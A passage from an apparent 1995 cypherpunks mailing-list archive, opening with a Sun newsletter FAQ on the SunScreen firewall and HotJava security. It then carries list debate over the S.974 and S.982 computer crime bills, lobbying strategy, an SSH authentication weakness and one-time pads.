transmissions. The SPF-100 packet screen software runs as an integral part of the SunScreen operating environment. It tracks the state of session oriented packet transactions (e.g. TCP) as well as sessionless packet transactions (e.g., UDP). Maintaining state allows the SunScreen to provide additional protection from connection stealing. Effectively, the SPF-100 is invisible to any network entity other than certified Administration Stations. Interfaces that participate in the packet screening activity have no IP address and do not respond to any network probing; they simply pass packets on to the screen. Using the SunScreen Administrative GUI, an administrator can specify packet screening rules, specify encryption/decryption criteria, configure and implement a security policy and monitor the SPF-100 actions on incident network traffic. All transactions between associated Administrative Stations and SPF-100's are encrypted, adding security to administrative activity. What is a packet screen? How is a SunScreen packet screen set up? A packet screen is a software filter that is imposed on a network data packet as it passes from a public network to a private network. A packet screen acts on a data packet according to a set of rules. Generally speaking, rules are used to discriminate certain packets and to initiate certain actions on those packets. SunScreen packet screens are specified by an administrator at the Administration Station. A packet screen rule is defined by the contents of three discriminator fields and two actor fields. Two of the discriminator fields are the packet source and destination address. These may be addresses of networks, subnets, hosts, or groups of hosts. The third discriminator field identifies the packet's Internet service type, e.g. telnet or ftp. This really equates to a socket port number, so privately defined services can be discriminated as well. SunScreen also does port coloring to ensure that the source address is consistent with the ethernet interface. The two actor fields determine what action is taken if the discriminating conditions select an incoming packet. One actor simply determines if the packet passes or fails. The other determines what explicit action the packet triggers. An example of a rule would be to discriminate any packet originating at IP address 192.9.185.28, heading for IP address 129.146.10.14, and using the telnet service. Any packet that meets these criteria is allowed to pass through the screen but it is logged as an event. In SunScreen, the default screening rule is to fail any packet that is not explicitly allowed to pass. What encryption alternatives are available in SunScreen? SunScreen uses a combination of shared key and public key encryption to provide data privacy and authentication. Privacy means that only the intended recipient will be able to decipher the message; authentication means that there is a high level of confidence that the identity of the message originator is valid and that the message has not been modified in transmission. The following encryption software is available on SunScreen: shared key: 40-bit RC2 and RC4, 56-bit DES public key: 1024-bit RSA, 1024-bit Diffie-Hellman Shared key encryption and public key encryption both have advantages and disadvantages. Shared key encryption is desirable because it ensures confidence in privacy and yet is moderate in its demands for processing power during data transformation. It is flawed because both sender and recipient need access to the same key; having to distribute a key compromises its secrecy. In public key encryption, two keys are used - a private key and a public key. The two keys are generated in the same operation. One key can be thought of as the inverse of the other, though there is no obvious relationship between the two. Any data stream that is encrypted using one key can be decrypted by the other, but only by the other. The owner of the private key can distribute the public key at will, but need never (and should never) distribute the private key. Therefore, public key encryption solves the twin problems of privacy and authentication. Consider the case of a holder of a public key encrypting a message to be sent to the owner of its private pair. This is a private transmission because nobody but the private key owner can decrypt the message. Now consider the case of the of the owner of the private key sending an encrypted message to a public key pair holder. If this message decrypts successfully, then it must have come from the private key owner. It is authenticated. A minor disadvantage to public key encryption is that each originator needs his own private key and multiple public keys in order to exchange private messages. A major disadvantage is that public key cryptography demands a lot of processing power during data transformations. SunScreen combines these methods to assure private and authenticated message transmission across public networks at reasonable performance. Why was a PC chosen as the Administration Station platform? >From a marketing perspective, since SunScreen is targeted towards all customers, not just current Sun customers, it was felt that "a black box controlled by a PC running Windows" would be easier to explain and sell and would not require a detailed discussion of UNIX. Additionally, since the Administration Station is required to be a dedicated system, it was felt that customers would be more receptive to a lower cost machine such as a PC, being a dedicated, single-purpose- only system. Finally, ICG will be offering an end-user solution and due to its popularity considered the PC a good end-user prototype. A SPARC-based desktop Administration Station is under consideration What is Sun ICG? ICG is the Internet Commerce Group, a Sun business whose charter is to produce enabling technologies and solutions for doing business over the Internet and other public networks. ICG will be developing the SunScreen Product Line, and its first product offering is the SPF-100 What is packet tunneling? Packet tunneling refers to the capability of encapsulating one packet in another packet. Together with encryption, tunneling provides data privacy as well as network topology hiding. Network packets traveling between two private networks are encrypted and encapsulated in a wrapper packet at the exit point of one network and unwrapped and decrypted at the entry point of the other and then passed along to their destination host. What is packet vectoring? Packet vectoring is a capability which enables a packet to be "copied" and diverted to other areas in addition to its intended route, for further processing. Packet vectoring enables distributed processing of packet streams for billing, metering, auditing and intrusion detection purposes. SunScreen includes the capability to do packet vectoring but currently does not have an application which would enable it to be used by customers. What is SKIP? SKIP, an acronym for Simple Key Management Internet Protocol, provides a simple means of secure communications between two SunScreens across the Internet. SKIP was invented by Ashar Aziz of Sun Microsystems, Inc. and is currently being considered by the Internet Engineering Task Force (IETF) as an Internet service standard. It is a sessionless service that acts as the entry and exit point for secure communications between two private networks. When invoked as a service, SKIP encrypts a client packet stream as described above. Using packet tunneling, client source and destination encrypted, hiding private network topologies from the public. This encrypted packet stream is then forwarded to the destination network, where it is decrypted by another SunScreen supporting the SKIP service. Once inside the destination private network, the packet stream continues on its way to the destination host. Details on the SKIP specification can be found at http://skip.incog.com/ Does SunScreen support application relays? SunScreen does not support application relays. There is no way to load applications on the SPF-100 embedded operating system. However SunScreen application relays are legitimate, useful adjuncts to a secure network. They can easily be integrated into a network access barrier created by a SunScreen. One or more of the Quad Ethernet interfaces on the SunScreen can be dedicated to a network supporting systems with application relays. Using the SunScreen packet filtering feature, packets appropriate for an application relay would be directed to the host running that application relay, returned to the SunScreen, and passed on (or failed) to their destination. What products compete with SunScreen? SunScreen is a high-end network security solution. It is unique not only due to its stealth design and integrated encryption technology, but also because it includes services which makes it a truly complete security solution. Other security products on the market today are either implemented only in software, lack encryption capabilities or are run layered on top of existing, multi purpose operating systems. Currently popular security products include Eagle/Raptor, TIS Gauntlet, CheckPoint FireWall-1, DEC SEAL, ANS Interlock and Livingston Enterprises Firewall IRX. Who are likely customers for SunScreen ? SunScreen is targeted at commercial, enterprise, highly networked customers. Commercial enterprises which are critically dependent on networks for their business functioning are the primary candidates for this product. Such customer include telecommunications companies, financial institutions, health care organizations and the Government How does SunScreen differ from FireWall-1 ? SunScreen can be regarded as a functional superset of FireWall-1 . It is a highly sophisticated network security solution targeted at complex, commercial networks. FireWall-1 restricts its operation to packet screening. SunScreen provides support for message encryption/decryption. In addition, SunScreen is invisible from the network, rendering it more difficult to detect and invade; SunScreen SPF-100 can only interface to a qualified Administration Station using an encrypted link, making it very difficult to probe or to modify the operating environment. SunScreen provides a higher level of security at a higher price. Users need to evaluate their security needs. FireWall-1 may provide adequate security for the basic security needs of corporation. What restriction does the US Government impose on using cryptographic methods available with SunScreen? All modes of encryption included with SunScreen are permitted for all transactions within the U.S.A.. and Canada. Shipping encryption products including DES, 1024 bit Diffie-Hellman, and 1024 bit RSA outside the U.S.A.. and Canada requires an export license. An export license for the use of an encryption product by a foreign based entity controlled by a U.S.A.. company, has a strong prospect for approval What special security issues does interaction with the WWW present? Communication with the WWW and other Internet services such as Archie and Gopher present no special problem for SunScreen security. Packet screens can easily be configured to regulate traffic from/to these services using standard Administration Station tools. Is there any kind of security certification for this class of product? Typically, security classification such as B1 , C2 , etc. issued by the NSA, entails certification of a complete operation environment, including hardware, OS, applications, etc. Sun has designed the product to be independent of a multi purpose operating system. The embedded OS included in the SPF-100, has been stripped off all network services, user programs, etc. and can be used only for executing the SunScreen software. However, with the recognition that some sort of security classification will be required for SunScreen, Sun is working with the proper authorities to define appropriate classifications for this new class of security. ------------------------------------------------------------------------------ HotJava Security Answers First some bulk information on Java security, there are three concepts here and you have to keep them separate: Safety, Security, and Trust. They apply to both the language itself (Java) and the browser written in the language (HotJava). Java - Security Within The Language: Safety: The Java language is safe because the language has no intrinsic semantics for modifying the trusted computing base. In simple terms this means that there is no way for pure Java code to modify its own stack, write on memory it hasn't allocated, or execute methods (invoke functions) it wasn't explicitly given access too. The mechanisms used to create this safety are the language design (no semantics), the virtual machine design (sufficient semantic information is retained in a 'binary' to verify that the language imposed limits are not violated), and un-forgeable pointers (no casting). Further memory reclamation is done by a garbage collector which eliminates hanging pointer problems. Array indexing and pointer casting is checked at runtime for validity. Security: The Java language is secure because, as an object oriented language the only way to do anything is to invoke a method on a class, and the only way to instantiate a class is with the 'new' operator. This operator is tied into a system class of type ClassLoader which enforces arbitrary security policies on classes that it loads. Class loaders are thus the arbiters of the capabilities granted a class they have instantiated. Trust: The Java language will supply a class loader capable of verifying a digital signature on a class prior to loading that class. This allows different capabilities to be assigned to classes of differing origin. Further, classes will be able to query the class loader for this information and thus be able determine if they are being called by a trusted class. (this is required to export cryptography in the Java runtime, the crypto classes have to know who is calling them so as to enforce US mandated restrictions on their operation.) HotJava - Security Within The Browser: Safety: Safety in the HotJava browser revolves around primarily the control of applets. Applets are loaded using an anal class loader called the NetClassLoader. This class loader can control access to system services. Further the implementation of certain classes (such as File) recognize when they are being invoked from a class that was loaded from the network class loader and they enforce additional restrictions. For example, applets can only open files in two directories on UNIX systems: /tmp/hotjava and ~/.hotjava (this can be modified with the READPATH and WRITEPATH environment var's) Further when files are accessed in these directories a confirmation is raised in the form of a dialog with the user. There is no way for an applet to get around this restriction. To open a file it _has_ to use the File class, the network class loader won't allow it to load a new version of the File class, and the file class has to have some bound in C code to do its work and the applet can't bring over its own native code. Its stuck. Security: The browser keeps track of what the applets are doing. Under some conditions it modifies the capabilities available to an applet after certain events. For example, the network class loader keeps track of whether or not the applet came from "within" the firewall (direct access to host) or "outside" the firewall (through the firewall). It also keeps track of any files or sockets the applet opens. If the applet opens any socket or file that is bound "inside" the firewall (any file, and host inside the firewall) it is prevented from ever opening a connection to a host "outside" the firewall. Trust: The browser is "trusted" code, and the source is available to assist in developing trust of the code. Further it will be possible to sign all valid browser classes (package browser.*) with a browser key, preventing from any subversion of the browser after it has reached trusted status. (I envision it working something like: Certify the browser through inspection or what ever, build the classes, sign the classes, invoke the browser with the public key of the signature. Destroy the secret key.) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Press announcements and other information about Sun Microsystems are available on the Internet via the World Wide Web. URL http://www.sun.com SunFlash - A Full-Text On Demand Newsletter for Users of Sun Computers John J. McLaughlin - Publisher & Editor - flash at FlashBack.COM Tim Wells - Associate Editor - tim at FlashBack.COM Mark Wood - Distribution Manager - flashadm at FlashBack.COM Subscriptions to majordomo at FlashBack.COM Article Requests to flashback at FlashBack.COM Article Submissions to flash at FlashBack.COM For more information send email to flashback at FlashBack.COM with article names or numbers in the Subject line: 9001 - general introduction index - for an index of the most recent 150 articles fullindex - for an index of 800+ articles popular - for a summary of the popular article for each month 73.00 1176 - For the January 1995 Table of Contents 74.00 - For the February 1995 Table of Contents 75.00 1221 - For the March 1995 Table of Contents 76.00 1262 - For the April 1995 Table of Contents 77.00 1286 - For the May 1995 Table of Contents 78.00 1344 - For the June 1995 Table of Contents ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ From jya at pipeline.com Thu Jul 13 18:48:18 1995 From: jya at pipeline.com (John Young) Date: Thu, 13 Jul 95 18:48:18 PDT Subject: DOJ Press Release, S. 974? Message-ID: <199507140148.VAA07551@pipe4.nyc.pipeline.com> It is not obvious that this refers to S. 974 but seems to be the press release John Noble cites on Cyberia-L. Did anyone see news reports on this? URL: gopher://justice2.usdoj.gov/00/press/previous/ June95/370.txt For Immediate Release AG Thursday, June 29, 1995 (202) 616-2777 TDD (202) 514-1888 Administration, Congress Introduce New Computer Crime Legislation Washington, D.C. -- Attorney General Janet Reno today announced that the Clinton Administration, along with Senators John Kyl, Patrick Leahy, and Charles Grassley has introduced legislation dramatically increasing federal protections of data confidentiality. Current law protects the confidentiality of financial information. Today's legislation would protect all government data against access without permission, as well as criminalizing access by government employees who exceed their authority to gain access to government data. "As technology advances, computer crime has grown," said Reno. "We have to ensure that the law keeps up with changing times." With the phenomenal growth of legitimate computer use has come a similar growth in computer crime and the problem of "hackers" who break into computer networks without authority to steal information or damage computer systems. In addition to penetrating telephone networks to disrupt phone service and wiretap calls, many hackers attack government and private computers to steal valuable information. According to the Computer Emergency Response Team at Carnegie Mellon University, during the past four years, the number of reported intrusions on the Internet has increased 498 percent, and the number of computer sites affected has increased 702 percent. "Computer crime is fast becoming everyone's problem," said Reno. "I'm encouraged that this bill is off to a bipartisan start, and I hope Congress will move quickly to enact it." The new Act provides three new tools to address this problem: + More computers would be protected by federal law. Under the new law, a "protected computer" would be defined as any government computer, financial institution computer, or any other computer used in interstate or foreign commerce or communications. Under current law, computers are not adequately protected from foreign hackers, and no federal jurisdiction can be obtained when the hacker's and the victim's computers are located in the same state. + Under the new law, all government data would be protected, and the federal government could prosecute individuals who access government data for their own use. Additionally, private data would be protected when hackers steal information from computers located across state or national borders. Currently, only financial data and classified information are strictly protected from improper access. + The integrity and availability of data would be better protected under the new law because it ensures that all hackers are punished adequately. Current law provides penalties for intentional damage, but hackers who recklessly or accidently damage information or systems face little or no penalties. ### 95-370 [End press release] From fstuart at vetmed.auburn.edu Thu Jul 13 18:56:00 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Thu, 13 Jul 95 18:56:00 PDT Subject: co-sponsors S.974 Message-ID: <199507140155.UAA00007@snoopy.vetmed.auburn.edu> >I searched Thomas and couldn't find any evidence of >co-sponsors to the Senate bill. Am I wrong here? [...] >Anyone got better info on yes/no sponsors or seen the DOJ press >release? There are 2 bills. Senator Grassley's repressive Anti-Electronic Racketeering Act of 1995 (S.974) has no co-sponsors. Senators Leahy, Kyle, and Grassley co-sponsored the National Information Infrastructure Protection Act of 1995 (S.982). I haven't seen any analysis of it, but I did a quick read of it and didn't see anything alarming. | Putt's Law: Frank Stuart | Technology is dominated by two types of people: fstuart at vetmed.auburn.edu | Those who understand what they do not manage. stuarfc at mail.auburn.edu | Those who manage what they do not understand. From perry at imsi.com Thu Jul 13 18:57:03 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 18:57:03 PDT Subject: Fight, or Roll Over? In-Reply-To: Message-ID: <9507140155.AA13373@snark.imsi.com> "Robert A. Hayden" writes: > On Thu, 13 Jul 1995, Douglas Barnes wrote: > > > Since the Anti-Electronic Racketeering Act of 1995 might as well > > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see > > Tim throw in the towel already, when the bill hasn't even made it > > through committee yet. > > I don't think Tim threw in the towell on this bill, but has come to > realize that the overall war on privacy cannot be won by concentrating on > the individual battles. Thats true. However, I think that one strategic move would be to get a PR firm involved that is capable of severly embarassing any politico who puts his name any of these proposals. After two or three of those they start getting gunshy. Folks, this isn't trivial. It isn't an easy thing to do by any means. However, it is far from impossible. > We've ALL got to take a deep breath and come up with a different > plan of attack; a plan that the TLAs and spooks will be unable to > defend against. There is no such plan. They can't control the technology in the long run but they can throw us all in jail in the short run. I have substantial personal interest in keeping this stuff legal, and I don't give a flying fig *who* sponsors legislation. Do you think the agricultural industry lies down every time that congress proposes to cut subsidies? Do you think that the gun lobby lies down and plays dead? They get a bad bill proposed virtually every week. Do you think the health care industry would have been correct to say "oh, Hillary has us bushwacked -- this is a major initiative. Guess we'd better give up." Anyone who is saying that it is impossible to fight the legislative battles hasn't been thinking. It takes millions of dollars, but there is a lot of money out there to be had in my opinion. Perry From hayden at krypton.mankato.msus.edu Thu Jul 13 19:00:08 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 19:00:08 PDT Subject: Fight, or Roll Over? In-Reply-To: <9507140155.AA13373@snark.imsi.com> Message-ID: On Thu, 13 Jul 1995, Perry E. Metzger wrote: > Anyone who is saying that it is impossible to fight the legislative > battles hasn't been thinking. It takes millions of dollars, but there > is a lot of money out there to be had in my opinion. Nobody's saying it's impossible, what we're saying is that we don't have the resources to DO that on the scale that is needed. Maybe Microsoft does, but we don't. What we can do, however, is to shape the culture of the net. That culture will have to eventually be listened to by DC. ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From perry at imsi.com Thu Jul 13 19:04:34 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 19:04:34 PDT Subject: Ssh security hole? In-Reply-To: <199507132303.CAA18383@shadows.cs.hut.fi> Message-ID: <9507140202.AA13400@snark.imsi.com> Tatu Ylonen writes: > (I'll forward your message to a couple of lists where it might be > of interest; the original message is at end.) > > I think you are right in your analysis. There is indeed a problem > with RSA authentication. Basically what this means is that if you log > into a corrupt host, that host can at the same time log into another > host with your account (by fooling you to answer to the request) > provided that you use the same RSA identity for both hosts. > > A workaround is to use a different identity for each host you use. > The default identity can be specified on a per-host basis in the > configuration file, or by -i options. Might I suggest that a better solution would be to adapt the station to station protocol, or, even better, Photuris... .pm From hayden at krypton.mankato.msus.edu Thu Jul 13 19:15:35 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 19:15:35 PDT Subject: Root Causes In-Reply-To: <199507140151.UAA01504@arnet.arn.net> Message-ID: If I understand, you can't sue the governemtn for just trying to pass a law, or for even passing it. What has to happen is that somebody needs to be arrested and charged with breaking the law before you can challenge them. Although publishing an "Enemies of the Constitution" list all over the net, listing which congress-critters opposed the constitution (suck as Exon) might be interesting. Might even make a good web project. *ponders* ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From perry at imsi.com Thu Jul 13 19:24:19 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 19:24:19 PDT Subject: Fight, or Roll Over? In-Reply-To: Message-ID: <9507140224.AA13439@snark.imsi.com> Someone says: > By causing us to go into paroxysms of activity every time they throw a new > piece of legislation over the transom, we dissipate our efforts in more > promising areas. Er, heh? 1) 95% of the people on this list write no code and participate in no design activities, so they have no efforts to dissipate. 2) If there was a lobbying effort, the most participation anyone in the "we" above would end up doing is throwing cash at some Washington firm. I doubt that anyone would be involved directly, so how does this "disspiapate our efforts"? 3) What you mean "we", kimosabe? .pm From shamrock at netcom.com Thu Jul 13 19:27:17 1995 From: shamrock at netcom.com (Lucky Green) Date: Thu, 13 Jul 95 19:27:17 PDT Subject: Root Causes Message-ID: <199507140224.WAA05123@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199507140151.UAA01504 at arnet.arn.net>, merriman at arn.net (David K. Merriman) wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >While I respect the ideas and opinions submitted by the majority of the >members of this list, I wonder if perhaps we're failing to deal with the >_root_ problem of such things as the CDA, Clipper, DTA, etc. > >Specifically, I wonder if it wouldn't be a better approach to *prevent* such >measures from ever being proposed in the first place. Short of a 50 kilo ton bomb on Washington, I don't see any way that could be accomplished. >Is there any precedence or possibility of either filing civil or criminal >charges against a Government official for their _official_ actions? >Something that will not only make for some Serious Press, but hit them from >an unexpected angle? You can't sue the government without its prior consent. Government officials are also usually immune from being sued over their official actions. >It would seem that things such as the CDA, etc, are patent violations of the >Bill of Rights. As such, wouldn't the Congressrodent(s) proposing such >measures be violating our civil rights, and thus be criminally liable? >Aren't Congressrodents supposed to take an Oath of Office that involves >upholding the Constitution? The oath is not ment to be kept. It's sole purpose is to provide a photo op for the incomming congresscritters. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMAXVPioZzwIn1bdtAQFp5gF/WnEoNO15G11gXi9G/BmtFzu/toHZPBmj ldONnU+mbB5c9LIGeJH3usQZLdT/D4Sw =NpN9 -----END PGP SIGNATURE----- From lmccarth at cs.umass.edu Thu Jul 13 19:27:31 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 19:27:31 PDT Subject: co-sponsors S.974 In-Reply-To: <199507140100.VAA00681@pipe4.nyc.pipeline.com> Message-ID: <9507140227.AA13589@cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- Shari Steele writes, re: S.974, the Anti-Electronic Racketeering Act [via gnu, on the cypherpunks list]: # Fortunately, the bill does not have a very promising # future. The bill has no co-sponsors. James R. Coleman (or John Noble ? screwed up attributions) writes [via jya, on cyberia-l]: > The bill was co-sponsored by Sens. Kyl (R-AZ) and Leahy > (D-VT). It has the enthousiastic support of the > administration. In a DOJ press release following its > introduction, AG Reno is quoted as saying "computer crime > is fast becoming everyone's problem. I'm encouraged that > this bill is off to a bipartisan start, and I hope > Congress will move quickly to enact it." I think I can settle the confusion about who's sponsoring what in the Senate. The bill described by Coleman ? Noble ? on cyberia-l appears to be S.982, the National Information Infrastructure Protection Act of 1995. According to Thomas (http://thomas.loc.gov), this bill was introduced in the Senate on June 29th (not 27th), and is cosponsored by, you guessed it, Sens. Kyl, Leahy, & Grassley. It mainly consists of a section entitled "Computer Crime", which sets penalties for breaking into systems, "damaging" data, systems, etc., ad nauseum. (This is why they give bills *numbers*, folks :) Here's an excerpt from Sen Leahy's introductory remarks for S.982 in the Congressional Record: --- begin excerpts --- [...] This bill will increase protection for both government and private computers, and the information on those computers, from the growing threat of computer crime. We increasingly depend on the availability, integrity, and confidentiality of computer systems and information to conduct our business, communicate with our friends and families, and even to be entertained. [...] Second, the bill would increase protection for the privacy and confidentiality of computer information. Recently, computer hackers have accessed sensitive data regarding Operation Desert Storm, penetrated NASA computers, and broken into Federal courthouse computer systems containing confidential records. Others have abused their privileges on Government computers by snooping through confidential tax returns, or selling confidential criminal history information from the National Crime Information Center. The bill would criminalize these activities by making all those who misuse computers to obtain Government information and, where appropriate, information held by the private sector, subject to prosecution. [...] --- end excerpts --- I seem to recall reading that non-subscribers can't post to cyberia-l. Feel free to forward this there, if a similar correction hasn't already appeared. -L. Futplex McCarthy PGP key by finger or server -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAXVuWf7YYibNzjpAQFTQAQAhRnHxtnQ0wcIOEzO+HDgYTr8R4qBzg/h 3UL9gQYWSkGDkhCqR7k31P1Mla7aj5kRHjMg0g7Xgyi2Ag6W89jtc1E4NKj2SP9a 4vlx5qtT0lMtNIRTlUBA5p76qS+EElFAXmbAwjOgH3EJzGRymKF/vE/Unek0M/QS iI32DT+RN2w= =hbAd -----END PGP SIGNATURE----- From perry at imsi.com Thu Jul 13 19:29:39 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 19:29:39 PDT Subject: def'n of "computer network" In-Reply-To: <9507132338.AA07522@toad.com> Message-ID: <9507140229.AA13447@snark.imsi.com> rick hoselton writes: > Perry, I don't understand. If the least significant bits in my gif file > follow all the "known statistical distributions", how can anyone know > whether they are "just noise" or are an encrypted message, Indeed -- how could the recipient even know to look, unless these things arrived regularly and with a fully standardized form of stegonography, in which case why bother, all you've done is come up with a very odd form of transfer encoding. If the recipient does know to look, that implies either that there is a hint, in which case the stegonography is useless, or it implies that you have prearrangement, in which case my comments on prearrangement hold. .pm From spector at zeitgeist.com Thu Jul 13 19:36:42 1995 From: spector at zeitgeist.com (David HM Spector) Date: Thu, 13 Jul 95 19:36:42 PDT Subject: co-sponsors In-Reply-To: Message-ID: <199507140235.WAA21027@zeitgeist.zeitgeist.com> A non-text attachment was scrubbed... Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From perry at imsi.com Thu Jul 13 19:36:47 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 19:36:47 PDT Subject: OTP server.. In-Reply-To: <199507132346.SAA07316@netman.eng.auburn.edu> Message-ID: <9507140235.AA13456@snark.imsi.com> Doug Hughes writes: > How about WWW one time pad servers? You browse to your > favorite OTP server, which has a random number generator > running in the background. You tell it to give you a block > of X bytes, and mail it to persons 1, 2, 3, ... N. Do I get you wrong, or are you proposing the mailing of one time pads in the clear? > Enough of these things would be REALLY tough to monitor... The NSA is willing to monitor virtually all international telecommunications traffic and try to figure out whats interesting. I doubt this poses much of a challenge to them. Not to mention the fact that it probably wouldn't pose much of a challenge to *me* given a set of wiretaps and I have virtually no resources... Perry From truher at mojones.com Thu Jul 13 19:38:26 1995 From: truher at mojones.com (Joel B. Truher) Date: Thu, 13 Jul 95 19:38:26 PDT Subject: The MoJo Wire thanks you Message-ID: Thank you for your help in our beta test! Please come back soon, and send me mail if you'd like to be removed from this mailing list -- we may send a new Web product announcement every few months, and you'll soon receive a survey of your opinion of our site. More info on The MoJo Wire: "More fun than a secret decoder ring!" -- Jim Hightower "Mother Jones magazine is turning the tables [on Gingrich]" -- LA Times Mother Jones is pleased to announce the official release of our redesigned WWW site, now called The MoJo Wire, on July 14th, at: http://motherjones.com * See Newt Gingrich's secret list of major funders on our "Coin- Operated Congress" feature. Gingrich is fighting the FEC in court to keep this information secret, but you can see it here for the first time. See the ten worst, the ten richest, the dirt on all of them, and help complete this interactive investigation project. * Newly revamped on-line chat software, called Live Wire, provides the best Web-based political discussions anywhere. Create hyperlinks in the words of others in this new feature, which already contains several lively debates. * The July/August issue of Mother Jones magazine is available only on The MoJo Wire. Read the full text of the magazine. Many thanks to our team of two thousand beta testers! With your help, we've worked a few of the last kinks out of the system, added a few things, and now offer the service password-free. For more information about The MoJo Wire, send mail to truher at mojones.com, or call me at 415-665-6637. Joel Truher Manager, The MoJo Wire From perry at imsi.com Thu Jul 13 19:53:08 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 19:53:08 PDT Subject: Root Causes In-Reply-To: <199507140151.UAA01504@arnet.arn.net> Message-ID: <9507140252.AA13485@snark.imsi.com> David K. Merriman writes: > Specifically, I wonder if it wouldn't be a better approach to *prevent* such > measures from ever being proposed in the first place. > > Is there any precedence or possibility of either filing civil or criminal > charges against a Government official for their _official_ actions? Not only is it a bad idea politically, but in fact members of congress are made specifically immune by the constitution from any legal action being taken against them for their words or actions during sessions of congress by any body other than congress. .pm From lmccarth at cs.umass.edu Thu Jul 13 19:58:05 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 19:58:05 PDT Subject: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering) In-Reply-To: <9507131857.AA12796@snark.imsi.com> Message-ID: <9507140257.AA13867@cs.umass.edu> > Perry, > > I have all I'm going to take of your acerbic rudeness to me. > > I will no longer be responding to any of your messages. > > --Tim Everybody needs to take a deep breath and count to 1,000. Seriously, we're all feeling plenty of stress today. Various people have been talking about getting out of the U.S. while the going's good (?), and it doesn't sound much like hyperbole this time. It's not surprising that we're releasing our frustration on each other, lashing out at the nearest quasi-tangible targets. Don't let them do this to us -- to you ! Remember, in the grand scheme of things, we are all very definitely on the same side of Evil like S.974. We need to pause, gather our wits a bit, and focus on some debate and action, rather than directing our anger at each other. This is no time for infighting, grudges, etc. -Futplex [if this was too touchy-feely for ya, feel free to vent some steam in private email ;] From perry at imsi.com Thu Jul 13 20:01:32 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 20:01:32 PDT Subject: Fight, or Roll Over? In-Reply-To: Message-ID: <9507140301.AA13498@snark.imsi.com> "Robert A. Hayden" writes: > On Thu, 13 Jul 1995, Perry E. Metzger wrote: > > > Anyone who is saying that it is impossible to fight the legislative > > battles hasn't been thinking. It takes millions of dollars, but there > > is a lot of money out there to be had in my opinion. > > Nobody's saying it's impossible, what we're saying is that we don't have > the resources to DO that on the scale that is needed. Since when? > Maybe Microsoft does, but we don't. I must admit to only having an academic knowledge of this process, but I strongly suspect that you are incorrect -- everything I've read, watched and learned of indicates to me that there are enough people and companies with an interest here to raise a few million dollars. Consider that Netscape alone is a very wealthy company that would have its marketing plans strongly disrupted by this new piece of congressional trash. A few million isn't enough to destroy carreers on the scale of the NRA, but its enough to make things very messy for people. > What we can do, however, is to shape the culture of the net. That > culture will have to eventually be listened to by DC. The beltway crowd doesn't log in. They ignored the petitions sent to Leahy for S.314 because they didn't think of the people who sent the petitions in as "real". I doubt they will understand the net for many years to come, whereas we have to stall out the NSA and company now. Incidently, unlike the NRA, I believe our task is merely to stifle legislation for about five years, at which point it will be too late for legislation. Perry From unicorn at polaris.mindport.net Thu Jul 13 20:03:20 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Thu, 13 Jul 95 20:03:20 PDT Subject: Fight, or Roll Over? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 9:55 PM 7/13/95, Perry E. Metzger wrote: >"Robert A. Hayden" writes: >> On Thu, 13 Jul 1995, Douglas Barnes wrote: >> >> > Since the Anti-Electronic Racketeering Act of 1995 might as well >> > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see >> > Tim throw in the towel already, when the bill hasn't even made it >> > through committee yet. >> >> I don't think Tim threw in the towell on this bill, but has come to >> realize that the overall war on privacy cannot be won by concentrating on >> the individual battles. > >Thats true. However, I think that one strategic move would be to get a >PR firm involved that is capable of severly embarassing any politico >who puts his name any of these proposals. After two or three of those >they start getting gunshy. > >Folks, this isn't trivial. It isn't an easy thing to do by any >means. However, it is far from impossible. > [...] > >Anyone who is saying that it is impossible to fight the legislative >battles hasn't been thinking. It takes millions of dollars, but there >is a lot of money out there to be had in my opinion. Perry and I discussed this a bit today. I have a call into a friend of mine at one of the larger firms in D.C., who I will neglect to name until I hear back. I have a feeling there are a pile of funds to be had, and I'm going to try to work with Perry to get the people who should be interested, interested. > >Perry -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMAc23y1onm9OaF05AQGbvwf+OrqSIlELmS4bDSMqkPU3WKoqH2GGG+/p ki4l4AW2mM9FUEwfSUErFibnXqik+6zRjkOsKPDEpbmbOc9HM/OnEO0v8MTM6nQZ 1QT6mFcR9rpF8v+ZNlN35davf9VLcsMX0avjWZmNJbtQHEG3wL1Vt1BhCBaJjA/b XkrNMAI5gbIp0ervus5WGcGEajGr2BhGU9EOpA0eLRs/eoCg4W2rVSuTxGXZ9XhL 